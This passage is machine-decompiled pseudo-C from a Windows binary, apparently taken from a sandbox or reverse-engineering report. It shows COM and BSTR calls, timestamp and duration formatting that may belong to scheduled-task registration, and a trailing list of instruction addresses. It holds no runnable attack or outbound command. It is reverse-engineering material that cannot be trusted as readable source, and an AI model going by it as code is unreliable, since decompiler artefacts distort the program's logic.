                          																																			if(_t1104 == 1) {
                          																																				__eflags = _t1127;
                          																																				if(_t1127 != 0) {
                          																																					_t900 =  *_t1127;
                          																																					__eflags = _t900;
                          																																					if(_t900 != 0) {
                          																																						__imp__#6(_t900);
                          																																						 *_t1127 = 0;
                          																																					}
                          																																					_t901 =  *(_t1127 + 4);
                          																																					__eflags = _t901;
                          																																					if(_t901 != 0) {
                          																																						L0132ECE6(_t901);
                          																																						_t1208 = _t1208 + 4;
                          																																						 *(_t1127 + 4) = 0;
                          																																					}
                          																																					_push(0xc);
                          																																					E0132EABA(_t1127);
                          																																					_t847 = _v116;
                          																																					_t1208 = _t1208 + 8;
                          																																				}
                          																																			}
                          																																		}
                          																																		__eflags = _t847;
                          																																		if(_t847 >= 0) {
                          																																			_t974 = _v52;
                          																																			_t1073 =  &_v100;
                          																																			_t849 =  *((intOrPtr*)( *_t974 + 0x2c))(_t974,  &_v100);
                          																																			__eflags = _t849;
                          																																			if(_t849 >= 0) {
                          																																				_t1051 = _v100;
                          																																				 *((intOrPtr*)( *_t1051 + 0x98))(_t1051, 0xffffffff);
                          																																				_t974 = _v52;
                          																																				 *((intOrPtr*)( *_t974 + 0x30))(_t974, _v100);
                          																																			}
                          																																			_t1104 = 8;
                          																																			_v104 = 0;
                          																																			_v204 = 8;
                          																																			_t852 =  *( *_v56 + 0x44);
                          																																			_v108 = _t852;
                          																																			__imp__#2(0x13836c0);
                          																																			_v196 = _t852;
                          																																			__eflags = _t852;
                          																																			if(__eflags == 0) {
                          																																				L191:
                          																																				E0132FAD0(0x8007000e);
                          																																				goto L192;
                          																																			} else {
                          																																				_v32 = 0x10;
                          																																				asm("movups xmm0, [ebp-0xb0]");
                          																																				asm("movups [ebp-0x78], xmm0");
                          																																				_t853 = E0132EA8A(_t1127, __eflags, 0xc);
                          																																				_t1161 = _t853;
                          																																				_t1208 = _t1208 + 4;
                          																																				_v120 = _t1161;
                          																																				_v32 = 0x11;
                          																																				__eflags = _t1161;
                          																																				if(_t1161 == 0) {
                          																																					_t1127 = 0;
                          																																					__eflags = 0;
                          																																				} else {
                          																																					asm("xorps xmm0, xmm0");
                          																																					asm("movq [esi], xmm0");
                          																																					 *(_t1161 + 8) = 0;
                          																																					 *(_t1161 + 4) = 0;
                          																																					 *(_t1161 + 8) = 1;
                          																																					_t853 = E0132FAF0(_t947, 0x13836c2);
                          																																					 *_t1161 = _t853;
                          																																				}
                          																																				_v32 = 0x10;
                          																																				_v120 = _t1127;
                          																																				__eflags = _t1127;
                          																																				if(_t1127 == 0) {
                          																																					L192:
                          																																					E0132FAD0(0x8007000e);
                          																																					goto L193;
                          																																				} else {
                          																																					_v32 = 0x12;
                          																																					_v188 = _t1104;
                          																																					_t1104 =  *_t1127;
                          																																					__eflags = _t1104;
                          																																					if(__eflags != 0) {
                          																																						__imp__#149(_t1104);
                          																																						__imp__#150(_t1104, _t853);
                          																																						_v180 = _t853;
                          																																						__eflags = _t853;
                          																																						if(__eflags == 0) {
                          																																							goto L189;
                          																																						} else {
                          																																							goto L153;
                          																																						}
                          																																					} else {
                          																																						_v180 = _t1104;
                          																																						L153:
                          																																						_v32 = 0x13;
                          																																						asm("movups xmm0, [ebp-0xa0]");
                          																																						asm("movups [ebp-0xc0], xmm0");
                          																																						_t1119 = E0132EA8A(_t1127, __eflags, 0xc);
                          																																						_t1208 = _t1208 + 4;
                          																																						_v112 = _t1119;
                          																																						_v32 = 0x14;
                          																																						__eflags = _t1119;
                          																																						if(_t1119 == 0) {
                          																																							_t1104 = 0;
                          																																							__eflags = 0;
                          																																						} else {
                          																																							asm("xorps xmm0, xmm0");
                          																																							asm("movq [edi], xmm0");
                          																																							 *(_t1119 + 8) = 0;
                          																																							 *(_t1119 + 4) = 0;
                          																																							 *(_t1119 + 8) = 1;
                          																																							 *_t1119 = E0132FAF0(_t947, 0x13836c2);
                          																																						}
                          																																						_v32 = 0x13;
                          																																						_v132 = _t1104;
                          																																						__eflags = _t1104;
                          																																						if(_t1104 == 0) {
                          																																							goto L189;
                          																																						} else {
                          																																							_v32 = 0x15;
                          																																							_v172 = 8;
                          																																							_t856 =  *_t1104;
                          																																							_v112 = _t856;
                          																																							__eflags = _t856;
                          																																							if(_t856 != 0) {
                          																																								__imp__#149(_t856);
                          																																								__imp__#150(_v112, _t856);
                          																																								_v164 = _t856;
                          																																								__eflags = _t856;
                          																																								if(_t856 == 0) {
                          																																									L193:
                          																																									E0132FAD0(0x8007000e);
                          																																									asm("int3");
                          																																									asm("int3");
                          																																									_push(_t1170);
                          																																									_t1172 = _t1208;
                          																																									_push(0xffffffff);
                          																																									_push(0x1366305);
                          																																									_push( *[fs:0x0]);
                          																																									_t649 =  *0x13a4018; // 0x39cca9f6
                          																																									_t650 = _t649 ^ _t1172;
                          																																									_v648 = _t650;
                          																																									_push(_t1127);
                          																																									_push(_t1104);
                          																																									_push(_t650);
                          																																									 *[fs:0x0] =  &_v644;
                          																																									_t1105 = _v624;
                          																																									asm("xorps xmm0, xmm0");
                          																																									_v724 = _t1105;
                          																																									_v756 = _t1105;
                          																																									asm("movlpd [ebp-0x30], xmm0");
                          																																									E0134A72C(_t974, _t1073,  &_v680);
                          																																									_push( &_v680);
                          																																									_push( &_v716);
                          																																									E0134A14E();
                          																																									_t657 = _v712;
                          																																									_t1210 = _t1208 - 0x70 + 0xc;
                          																																									__eflags = _t657 - 0x3b;
                          																																									if(_t657 != 0x3b) {
                          																																										_t658 = _t657 + 1;
                          																																										__eflags = _t658;
                          																																										_v112 = _t658;
                          																																									} else {
                          																																										_t761 = _v108;
                          																																										__eflags = _t761 - 0x17;
                          																																										if(_t761 >= 0x17) {
                          																																											_v108 = 0;
                          																																											_v112 = 0;
                          																																										} else {
                          																																											_v112 = 0;
                          																																											_v108 = _t761 + 1;
                          																																										}
                          																																									}
                          																																									_v56 = 0;
                          																																									_v52 = 0xf;
                          																																									_v72 = 0;
                          																																									_t1128 = E012F57D0(_t947, _t1073, _t1105, 0x110);
                          																																									_v56 = 0x104;
                          																																									_v120 = _t1128;
                          																																									_v52 = 0x10f;
                          																																									E013478D0(_t1105, _t1128, 0, 0x104);
                          																																									 *((char*)(_t1128 + 0x104)) = 0;
                          																																									E012F5760( &_v72,  &_v120);
                          																																									_v36 = 0;
                          																																									__eflags = _v52 - 0x10;
                          																																									_t665 =  >=  ? _v72 :  &_v72;
                          																																									_t666 = E0134A70D( >=  ? _v72 :  &_v72, _v56, "%Y-%m-%dT%H:%M:%S",  &_v116);
                          																																									_t1211 = _t1210 + 0x28;
                          																																									_push(0);
                          																																									__eflags = _t666;
                          																																									if(_t666 == 0) {
                          																																										 *(_t1105 + 0x10) = 0;
                          																																										 *(_t1105 + 0x14) = 7;
                          																																										 *_t1105 = 0;
                          																																										E012F51B0(_t947, _t1105, _t1105, _t1128, 0x13836c0);
                          																																										_t982 = _v52;
                          																																										__eflags = _t982 - 0x10;
                          																																										if(_t982 >= 0x10) {
                          																																											_t987 = _t982 + 1;
                          																																											__eflags = _t987;
                          																																											_push(_t987);
                          																																											goto L213;
                          																																										}
                          																																										goto L214;
                          																																									} else {
                          																																										_push(_t666);
                          																																										_t988 =  &_v72;
                          																																										L217();
                          																																										__eflags = _v52 - 0x10;
                          																																										_t673 =  >=  ? _v72 :  &_v72;
                          																																										_t1131 =  &((E012F5640( >=  ? _v72 :  &_v72))[_v56]);
                          																																										__eflags = _v52 - 0x10;
                          																																										_t676 =  >=  ? _v72 :  &_v72;
                          																																										_t1107 = E012F5640( >=  ? _v72 :  &_v72);
                          																																										_v132 = 0;
                          																																										_v128 = 7;
                          																																										_v148 = 0;
                          																																										_t1211 = _t1211 + 8;
                          																																										_t680 = _t1131 - _t1107;
                          																																										_v152 = _t680;
                          																																										__eflags = _t680 - 7;
                          																																										if(_t680 <= 7) {
                          																																											L207:
                          																																											_v124 =  &_v148;
                          																																											_v36 = 1;
                          																																											__eflags = _t1107 - _t1131;
                          																																											while(_t1107 != _t1131) {
                          																																												E012FC140(_t947,  &_v148, _t1107, _t1131,  *_t1107 & 0x0000ffff);
                          																																												_t1107 =  &(_t1107[1]);
                          																																												__eflags = _t1107 - _t1131;
                          																																											}
                          																																											_t1105 = _v156;
                          																																											asm("movups xmm0, [ebp-0x74]");
                          																																											_v148 = 0;
                          																																											_t683 = _v52;
                          																																											 *(_t1105 + 0x10) = 0;
                          																																											 *(_t1105 + 0x14) = 0;
                          																																											asm("movups [edi], xmm0");
                          																																											asm("movq xmm0, [ebp-0x64]");
                          																																											asm("movq [edi+0x10], xmm0");
                          																																											_v132 = 0;
                          																																											_v128 = 7;
                          																																											__eflags = _t683 - 0x10;
                          																																											if(_t683 >= 0x10) {
                          																																												_push(_t683 + 1);
                          																																												L213:
                          																																												E012F56A0(_t947, _t1105, _v72);
                          																																											}
                          																																											L214:
                          																																											 *[fs:0x0] = _v44;
                          																																											_pop(_t1129);
                          																																											__eflags = _v48 ^ _t1172;
                          																																											return E0132EA79(_v48 ^ _t1172, _t1129);
                          																																										} else {
                          																																											__eflags = _t680 - 0x7ffffffe;
                          																																											if(__eflags > 0) {
                          																																												E012F4B30(_t988, __eflags);
                          																																												goto L216;
                          																																											} else {
                          																																												_t750 = _t680 | 0x00000007;
                          																																												__eflags = _t750 - 0x7ffffffe;
                          																																												if(__eflags <= 0) {
                          																																													__eflags = _t750 - 0xa;
                          																																													_t751 =  <  ? 0xa : _t750;
                          																																												} else {
                          																																													_t751 = 0x7ffffffe;
                          																																												}
                          																																												_v120 = _t751;
                          																																												_t988 =  ~(0 | __eflags > 0x00000000) | _t751 + 0x00000001;
                          																																												__eflags = _t988 - 0x7fffffff;
                          																																												if(_t988 > 0x7fffffff) {
                          																																													L216:
                          																																													E012F4A60();
                          																																													asm("int3");
                          																																													asm("int3");
                          																																													asm("int3");
                          																																													asm("int3");
                          																																													asm("int3");
                          																																													asm("int3");
                          																																													asm("int3");
                          																																													asm("int3");
                          																																													asm("int3");
                          																																													asm("int3");
                          																																													_push(_t1172);
                          																																													_t1174 = _t1211;
                          																																													_t1214 = _t1211 - 0x14;
                          																																													_push(_t947);
                          																																													_t949 = _t988;
                          																																													_t990 = _v764;
                          																																													_t480 = _t949 + 0x10; // 0x10
                          																																													_t690 = _t480;
                          																																													_push(_t1131);
                          																																													_t1132 =  *_t690;
                          																																													_v780 = _t690;
                          																																													__eflags = _t990 - _t1132;
                          																																													if(_t990 > _t1132) {
                          																																														_t1074 =  *(_t949 + 0x14);
                          																																														_push(_t1107);
                          																																														_v56 = _t1074;
                          																																														_t1109 = _t990 - _t1132;
                          																																														_v52 = _t1109;
                          																																														__eflags = _t1109 - _t1074 - _t1132;
                          																																														if(_t1109 > _t1074 - _t1132) {
                          																																															__eflags = 0x7fffffff - _t1132 - _t1109;
                          																																															if(__eflags < 0) {
                          																																																E012F4B30(_t990, __eflags);
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																asm("int3");
                          																																																_push(_t1174);
                          																																																_t1175 = _t1214;
                          																																																_push(_t949);
                          																																																_t950 = _t990;
                          																																																_t991 = _v796;
                          																																																_push(_t1132);
                          																																																_push(_t1109);
                          																																																_t1110 = _v800;
                          																																																_t1075 =  *(_t950 + 0x14);
                          																																																_t1133 =  *((intOrPtr*)(_t950 + 0x10));
                          																																																_v824 = _t1110;
                          																																																_v813 = _t991;
                          																																																_v828 = _t1075;
                          																																																__eflags = _t1110 - _t1075 - _t1133;
                          																																																if(_t1110 > _t1075 - _t1133) {
                          																																																	__eflags = 0x7fffffff - _t1133 - _t1110;
                          																																																	if(__eflags < 0) {
                          																																																		E012F4B30(_t991, __eflags);
                          																																																		asm("int3");
                          																																																		asm("int3");
                          																																																		asm("int3");
                          																																																		asm("int3");
                          																																																		asm("int3");
                          																																																		asm("int3");
                          																																																		asm("int3");
                          																																																		asm("int3");
                          																																																		_push(_t1175);
                          																																																		_push(_t991);
                          																																																		_push(_t1133);
                          																																																		_push(2);
                          																																																		_t1134 = _t991;
                          																																																		_v848 = _t1134;
                          																																																		_t701 = E012F8A40(_t950, _v836, 0, L"PT");
                          																																																		 *(_t1134 + 0x10) = 0;
                          																																																		__eflags = 0;
                          																																																		 *(_t1134 + 0x14) = 0;
                          																																																		asm("movups xmm0, [eax]");
                          																																																		asm("movups [esi], xmm0");
                          																																																		asm("movq xmm0, [eax+0x10]");
                          																																																		asm("movq [esi+0x10], xmm0");
                          																																																		 *(_t701 + 0x10) = 0;
                          																																																		 *(_t701 + 0x14) = 7;
                          																																																		 *_t701 = 0;
                          																																																		return _t1134;
                          																																																	} else {
                          																																																		_t995 = _t1133 + _t1110 | 0x0000000f;
                          																																																		__eflags = _t995 - 0x7fffffff;
                          																																																		if(_t995 <= 0x7fffffff) {
                          																																																			_v44 = _t1075 >> 1;
                          																																																			__eflags = _t1075 - 0x7fffffff - _v44;
                          																																																			if(_t1075 <= 0x7fffffff - _v44) {
                          																																																				_t708 = _v44 + _t1075;
                          																																																				__eflags = _t995 - _t708;
                          																																																				_t996 =  <  ? _t708 : _t995;
                          																																																			} else {
                          																																																				_t996 = 0x7fffffff;
                          																																																			}
                          																																																		} else {
                          																																																			_t996 = 0x7fffffff;
                          																																																		}
                          																																																		_t532 = _t996 + 1; // 0x80000000
                          																																																		_v44 = _t996;
                          																																																		_t710 = E012F57D0(_t950, _t1075, _t1110, _t532);
                          																																																		_v52 = _t710;
                          																																																		 *((intOrPtr*)(_t950 + 0x10)) = _t1133 + _t1110;
                          																																																		__eflags = _v60 - 0x10;
                          																																																		 *(_t950 + 0x14) = _v44;
                          																																																		_v44 = _v45;
                          																																																		_push(_t1133);
                          																																																		if(_v60 < 0x10) {
                          																																																			_push(_t950);
                          																																																			_push(_t710);
                          																																																			E01345ED0();
                          																																																			_t1136 = _t1133 + _v52;
                          																																																			__eflags = _t1136;
                          																																																			E013478D0(_t1110, _t1136, _v44, _t1110);
                          																																																			 *((char*)(_t1136 + _t1110)) = 0;
                          																																																			E012F5760(_t950,  &_v52);
                          																																																			return _t950;
                          																																																		} else {
                          																																																			_t1112 =  *_t950;
                          																																																			_push( *_t950);
                          																																																			_push(_t710);
                          																																																			E01345ED0();
                          																																																			_t1138 = _t1133 + _v52;
                          																																																			E013478D0( *_t950, _t1138, _v44, _v56);
                          																																																			 *((char*)(_t1138 + _v56)) = 0;
                          																																																			_t720 = _v60 + 1;
                          																																																			__eflags = _t720;
                          																																																			_push(_t720);
                          																																																			E012F56A0(_t950,  *_t950, _t1112);
                          																																																			 *_t950 = _v52;
                          																																																			return _t950;
                          																																																		}
                          																																																	}
                          																																																} else {
                          																																																	_v44 = _t950;
                          																																																	 *((intOrPtr*)(_t950 + 0x10)) = _t1110 + _t1133;
                          																																																	_t725 = _t950;
                          																																																	__eflags = _t1075 - 0x10;
                          																																																	if(_t1075 >= 0x10) {
                          																																																		_t725 =  *_t950;
                          																																																		_v44 =  *_t950;
                          																																																	}
                          																																																	E013478D0(_t1110, _t725 + _t1133, _t991, _t1110);
                          																																																	_t1002 = _v44 + _t1110;
                          																																																	__eflags = _t1002;
                          																																																	 *((char*)(_t1002 + _t1133)) = 0;
                          																																																	return _t950;
                          																																																}
                          																																															} else {
                          																																																_t1003 = _t990 | 0x0000000f;
                          																																																__eflags = _t1003 - 0x7fffffff;
                          																																																if(_t1003 <= 0x7fffffff) {
                          																																																	_v40 = _t1074 >> 1;
                          																																																	__eflags = _t1074 - 0x7fffffff - _v40;
                          																																																	if(_t1074 <= 0x7fffffff - _v40) {
                          																																																		_t733 = _v40 + _t1074;
                          																																																		__eflags = _t1003 - _t733;
                          																																																		_t1004 =  <  ? _t733 : _t1003;
                          																																																	} else {
                          																																																		_t1004 = 0x7fffffff;
                          																																																	}
                          																																																} else {
                          																																																	_t1004 = 0x7fffffff;
                          																																																}
                          																																																_t493 = _t1004 + 1; // 0x80000000
                          																																																_v40 = _t1004;
                          																																																_t735 = E012F57D0(_t949, _t1074, _t1109, _t493);
                          																																																__eflags = _v56 - 0x10;
                          																																																_v48 = _t735;
                          																																																 *_v44 = _v28;
                          																																																 *(_t949 + 0x14) = _v40;
                          																																																_v44 = _v24;
                          																																																_push(_t1132);
                          																																																if(_v56 < 0x10) {
                          																																																	_push(_t949);
                          																																																	_push(_t735);
                          																																																	E01345ED0();
                          																																																	_t1141 = _t1132 + _v48;
                          																																																	__eflags = _t1141;
                          																																																	E013478D0(_t1109, _t1141, _v44, _t1109);
                          																																																	 *((char*)(_t1141 + _t1109)) = 0;
                          																																																	return E012F5760(_t949,  &_v48);
                          																																																} else {
                          																																																	_t1116 =  *_t949;
                          																																																	_push( *_t949);
                          																																																	_push(_t735);
                          																																																	E01345ED0();
                          																																																	_t1143 = _t1132 + _v48;
                          																																																	E013478D0( *_t949, _t1143, _v44, _v52);
                          																																																	 *((char*)(_t1143 + _v52)) = 0;
                          																																																	_t744 = _v56 + 1;
                          																																																	__eflags = _t744;
                          																																																	_push(_t744);
                          																																																	E012F56A0(_t949,  *_t949, _t1116);
                          																																																	_t746 = _v48;
                          																																																	 *_t949 = _t746;
                          																																																	return _t746;
                          																																																}
                          																																															}
                          																																														} else {
                          																																															 *_v44 = _t990;
                          																																															__eflags = _t1074 - 0x10;
                          																																															if(_t1074 >= 0x10) {
                          																																																_t949 =  *_t949;
                          																																															}
                          																																															_t1145 = _t1132 + _t949;
                          																																															__eflags = _t1145;
                          																																															_t749 = E013478D0(_t1109, _t1145, _v24, _t1109);
                          																																															 *((char*)(_t1145 + _t1109)) = 0;
                          																																															return _t749;
                          																																														}
                          																																													} else {
                          																																														__eflags =  *(_t949 + 0x14) - 0x10;
                          																																														if( *(_t949 + 0x14) >= 0x10) {
                          																																															_t949 =  *_t949;
                          																																														}
                          																																														 *_t690 = _t990;
                          																																														 *((char*)(_t949 + _t990)) = 0;
                          																																														return _t690;
                          																																													}
                          																																												} else {
                          																																													_t1012 = E012F57D0(_t947, _t1073, _t1107, _t988 + _t988);
                          																																													_v132 = _v152;
                          																																													_v128 = _v120;
                          																																													 *_t1012 = _v148;
                          																																													_v124 = _t1012;
                          																																													E012F5760( &_v148,  &_v124);
                          																																													_t1211 = _t1211 + 0xc;
                          																																													_v132 = 0;
                          																																													goto L207;
                          																																												}
                          																																											}
                          																																										}
                          																																									}
                          																																								} else {
                          																																									goto L159;
                          																																								}
                          																																							} else {
                          																																								_v164 = _t856;
                          																																								L159:
                          																																								_v32 = 0x16;
                          																																								asm("movups xmm0, [ebp-0x90]");
                          																																								_v112 = _v52;
                          																																								_t858 = _v128;
                          																																								asm("movups [ebp-0xd8], xmm0");
                          																																								__eflags =  *((intOrPtr*)(_t858 + 0x14)) - 8;
                          																																								if(__eflags >= 0) {
                          																																									_t858 =  *_t858;
                          																																								}
                          																																								_t859 = E012F9580( &_v116, __eflags, _t858);
                          																																								_v32 = 0x17;
                          																																								_t860 =  *_t859;
                          																																								__eflags = _t860;
                          																																								if(_t860 == 0) {
                          																																									_t1043 = 0;
                          																																									__eflags = 0;
                          																																								} else {
                          																																									_t1043 =  *_t860;
                          																																								}
                          																																								asm("movups xmm0, [ebp-0x78]");
                          																																								asm("movups [eax], xmm0");
                          																																								_t1234 = _t1208 - 0xfffffffffffffff0;
                          																																								asm("movups xmm0, [ebp-0xc0]");
                          																																								asm("movups [eax], xmm0");
                          																																								asm("movups xmm0, [ebp-0xd8]");
                          																																								asm("movups [eax], xmm0");
                          																																								_v112 = _v108(_v56, _t1043, _v112, 6, 0,  &_v104);
                          																																								_t866 = _v116;
                          																																								_v128 = _t866;
                          																																								__eflags = _t866;
                          																																								if(_t866 != 0) {
                          																																									asm("lock xadd [eax+0x8], ecx");
                          																																									__eflags = (_t1043 | 0xffffffff) == 1;
                          																																									if((_t1043 | 0xffffffff) == 1) {
                          																																										__eflags = _t866;
                          																																										if(_t866 != 0) {
                          																																											_t1049 =  *_t866;
                          																																											__eflags = _t1049;
                          																																											if(_t1049 != 0) {
                          																																												__imp__#6(_t1049);
                          																																												_t866 = _v128;
                          																																												 *_t866 = 0;
                          																																											}
                          																																											_t1050 =  *(_t866 + 4);
                          																																											__eflags = _t1050;
                          																																											if(_t1050 != 0) {
                          																																												L0132ECE6(_t1050);
                          																																												_t866 = _v128;
                          																																												_t1234 = _t1234 + 4;
                          																																												 *(_v128 + 4) = 0;
                          																																											}
                          																																											_push(0xc);
                          																																											E0132EABA(_t866);
                          																																											_t1234 = _t1234 + 8;
                          																																										}
                          																																									}
                          																																									_v116 = 0;
                          																																								}
                          																																								_t867 =  &_v172;
                          																																								__imp__#9(_t867);
                          																																								asm("lock xadd [edi+0x8], eax");
                          																																								__eflags = (_t867 | 0xffffffff) == 1;
                          																																								if((_t867 | 0xffffffff) == 1) {
                          																																									_t887 =  *_t1104;
                          																																									__eflags = _t887;
                          																																									if(_t887 != 0) {
                          																																										__imp__#6(_t887);
                          																																										 *_t1104 = 0;
                          																																									}
                          																																									_t888 =  *(_t1104 + 4);
                          																																									__eflags = _t888;
                          																																									if(_t888 != 0) {
                          																																										L0132ECE6(_t888);
                          																																										_t1234 = _t1234 + 4;
                          																																										 *(_t1104 + 4) = 0;
                          																																									}
                          																																									_push(0xc);
                          																																									E0132EABA(_t1104);
                          																																									_t1234 = _t1234 + 8;
                          																																								}
                          																																								_t1120 = __imp__#9;
                          																																								_t871 =  *_t1120( &_v188);
                          																																								asm("lock xadd [esi+0x8], eax");
                          																																								__eflags = (_t871 | 0xffffffff) == 1;
                          																																								if((_t871 | 0xffffffff) == 1) {
                          																																									_t883 =  *_t1127;
                          																																									__eflags = _t883;
                          																																									if(_t883 != 0) {
                          																																										__imp__#6(_t883);
                          																																										 *_t1127 = 0;
                          																																									}
                          																																									_t884 =  *(_t1127 + 4);
                          																																									__eflags = _t884;
                          																																									if(_t884 != 0) {
                          																																										L0132ECE6(_t884);
                          																																										_t1234 = _t1234 + 4;
                          																																										 *(_t1127 + 4) = 0;
                          																																									}
                          																																									_push(0xc);
                          																																									E0132EABA(_t1127);
                          																																								}
                          																																								_v32 = 0xffffffff;
                          																																								 *_t1120( &_v204);
                          																																								_t876 = _v56;
                          																																								 *((intOrPtr*)( *_t876 + 8))(_t876);
                          																																								_t878 = _v52;
                          																																								 *((intOrPtr*)( *_t878 + 8))(_t878);
                          																																								__eflags = _v112;
                          																																								if(_v112 < 0) {
                          																																									goto L100;
                          																																								} else {
                          																																									_t880 = _v104;
                          																																									 *((intOrPtr*)( *_t880 + 8))(_t880);
                          																																								}
                          																																								L101:
                          																																								 *[fs:0x0] = _v40;
                          																																								_pop(_t1124);
                          																																								__eflags = _v48 ^ _t1170;
                          																																								return E0132EA79(_v48 ^ _t1170, _t1124);
                          																																							}
                          																																						}
                          																																					}
                          																																				}
                          																																			}
                          																																		} else {
                          																																			_t898 = _v72;
                          																																			 *((intOrPtr*)( *_t898 + 8))(_t898);
                          																																			goto L142;
                          																																		}
                          																																	}
                          																																}
                          																															}
                          																														}
                          																													}
                          																												} else {
                          																													_t914 = _v56;
                          																													 *((intOrPtr*)( *_t914 + 8))(_t914);
                          																													_t785 = _v64;
                          																													L98:
                          																													 *((intOrPtr*)( *_t785 + 8))(_t785);
                          																													_t639 = _v52;
                          																													goto L99;
                          																												}
                          																											}
                          																										}
                          																									}
                          																								}
                          																							}
                          																						}
                          																					}
                          																				}
                          																			} else {
                          																				L63:
                          																				_t639 = _v56;
                          																				goto L99;
                          																			}
                          																		} else {
                          																			_t639 = _v60;
                          																			goto L99;
                          																		}
                          																	}
                          																}
                          															}
                          														}
                          													}
                          												}
                          											}
                          										}
                          									}
                          								}
                          							} else {
                          								_t1100 = _t1100 - _t1071;
                          								_t1059 =  <  ? _t1100 : _t967 | 0xffffffff;
                          								_push( <  ? _t1100 : _t967 | 0xffffffff);
                          								_t939 =  >=  ? _v56 :  &_v104;
                          								E012F51B0(_t945,  &_v160, _t1100, _t1122, ( >=  ? _v56 :  &_v104) + _t1071 * 2);
                          								asm("movups xmm0, [ebp-0x94]");
                          								asm("movq xmm1, [ebp-0x84]");
                          								goto L11;
                          							}
                          						}
                          					}
                          				}
                          			}

                          0x01302e31
                          0x01302e35
                          0x01302e3a
                          0x01302e3b
                          0x01302e3d
                          0x01302e3f
                          0x01302e41
                          0x01302e43
                          0x01302e45
                          0x01302e48
                          0x01302e4e
                          0x01302e4e
                          0x01302e54
                          0x01302e57
                          0x01302e59
                          0x01302e5c
                          0x01302e61
                          0x01302e64
                          0x01302e64
                          0x01302e6b
                          0x01302e6e
                          0x01302e73
                          0x01302e76
                          0x01302e76
                          0x01302e3f
                          0x01302e3b
                          0x01302e79
                          0x01302e7b
                          0x01302e8e
                          0x01302e91
                          0x01302e98
                          0x01302e9b
                          0x01302e9d
                          0x01302e9f
                          0x01302ea7
                          0x01302ead
                          0x01302eb6
                          0x01302eb6
                          0x01302ebc
                          0x01302ec1
                          0x01302ecf
                          0x01302ed6
                          0x01302ed9
                          0x01302edc
                          0x01302ee2
                          0x01302ee8
                          0x01302eea
                          0x013031f0
                          0x013031f5
                          0x00000000
                          0x01302ef0
                          0x01302ef0
                          0x01302ef7
                          0x01302f00
                          0x01302f04
                          0x01302f09
                          0x01302f0b
                          0x01302f0e
                          0x01302f11
                          0x01302f15
                          0x01302f17
                          0x01302f43
                          0x01302f43
                          0x01302f19
                          0x01302f19
                          0x01302f1c
                          0x01302f20
                          0x01302f2c
                          0x01302f33
                          0x01302f3a
                          0x01302f3f
                          0x01302f3f
                          0x01302f45
                          0x01302f49
                          0x01302f4c
                          0x01302f4e
                          0x013031fa
                          0x013031ff
                          0x00000000
                          0x01302f54
                          0x01302f54
                          0x01302f58
                          0x01302f5f
                          0x01302f61
                          0x01302f63
                          0x01302f6e
                          0x01302f76
                          0x01302f7c
                          0x01302f82
                          0x01302f84
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01302f65
                          0x01302f65
                          0x01302f8a
                          0x01302f8a
                          0x01302f8e
                          0x01302f97
                          0x01302fa3
                          0x01302fa5
                          0x01302fa8
                          0x01302fab
                          0x01302faf
                          0x01302fb1
                          0x01302fdd
                          0x01302fdd
                          0x01302fb3
                          0x01302fb3
                          0x01302fb6
                          0x01302fba
                          0x01302fc6
                          0x01302fcd
                          0x01302fd9
                          0x01302fd9
                          0x01302fdf
                          0x01302fe3
                          0x01302fe6
                          0x01302fe8
                          0x00000000
                          0x01302fee
                          0x01302fee
                          0x01302ff7
                          0x01302ffe
                          0x01303000
                          0x01303003
                          0x01303005
                          0x01303048
                          0x01303052
                          0x01303058
                          0x0130305e
                          0x01303060
                          0x01303204
                          0x01303209
                          0x0130320e
                          0x0130320f
                          0x01303210
                          0x01303211
                          0x01303213
                          0x01303215
                          0x01303220
                          0x01303224
                          0x01303229
                          0x0130322b
                          0x0130322e
                          0x0130322f
                          0x01303230
                          0x01303234
                          0x0130323a
                          0x01303240
                          0x01303243
                          0x01303247
                          0x0130324a
                          0x0130324f
                          0x01303257
                          0x0130325b
                          0x0130325c
                          0x01303261
                          0x01303264
                          0x01303267
                          0x0130326a
                          0x01303291
                          0x01303291
                          0x01303292
                          0x0130326c
                          0x0130326c
                          0x0130326f
                          0x01303272
                          0x01303281
                          0x01303288
                          0x01303274
                          0x01303275
                          0x0130327c
                          0x0130327c
                          0x01303272
                          0x0130329a
                          0x013032a1
                          0x013032a8
                          0x013032b6
                          0x013032b8
                          0x013032c2
                          0x013032c5
                          0x013032cc
                          0x013032d4
                          0x013032e0
                          0x013032e8
                          0x013032ef
                          0x013032f7
                          0x01303304
                          0x01303309
                          0x0130330c
                          0x0130330e
                          0x01303310
                          0x0130344b
                          0x01303452
                          0x01303460
                          0x01303463
                          0x01303468
                          0x0130346b
                          0x0130346e
                          0x01303470
                          0x01303470
                          0x01303471
                          0x00000000
                          0x01303471
                          0x00000000
                          0x01303316
                          0x01303316
                          0x01303317
                          0x0130331a
                          0x0130331f
                          0x01303326
                          0x01303335
                          0x01303338
                          0x0130333c
                          0x01303346
                          0x01303348
                          0x01303351
                          0x01303358
                          0x0130335c
                          0x01303361
                          0x01303363
                          0x01303366
                          0x01303369
                          0x013033e4
                          0x013033e7
                          0x013033ea
                          0x013033ee
                          0x013033f0
                          0x013033fd
                          0x01303402
                          0x01303403
                          0x01303403
                          0x01303407
                          0x0130340c
                          0x01303410
                          0x01303414
                          0x01303417
                          0x0130341e
                          0x01303425
                          0x01303428
                          0x0130342d
                          0x01303432
                          0x01303439
                          0x01303440
                          0x01303443
                          0x01303446
                          0x01303472
                          0x01303475
                          0x0130347a
                          0x0130347d
                          0x01303482
                          0x0130348b
                          0x0130348f
                          0x01303499
                          0x0130336b
                          0x0130336b
                          0x01303370
                          0x0130349c
                          0x00000000
                          0x01303376
                          0x01303376
                          0x01303379
                          0x0130337e
                          0x0130338c
                          0x0130338e
                          0x01303380
                          0x01303380
                          0x01303380
                          0x01303393
                          0x0130339e
                          0x013033a0
                          0x013033a6
                          0x013034a1
                          0x013034a1
                          0x013034a6
                          0x013034a7
                          0x013034a8
                          0x013034a9
                          0x013034aa
                          0x013034ab
                          0x013034ac
                          0x013034ad
                          0x013034ae
                          0x013034af
                          0x013034b0
                          0x013034b1
                          0x013034b3
                          0x013034b6
                          0x013034b7
                          0x013034b9
                          0x013034bc
                          0x013034bc
                          0x013034bf
                          0x013034c0
                          0x013034c2
                          0x013034c5
                          0x013034c7
                          0x013034df
                          0x013034e4
                          0x013034e7
                          0x013034ea
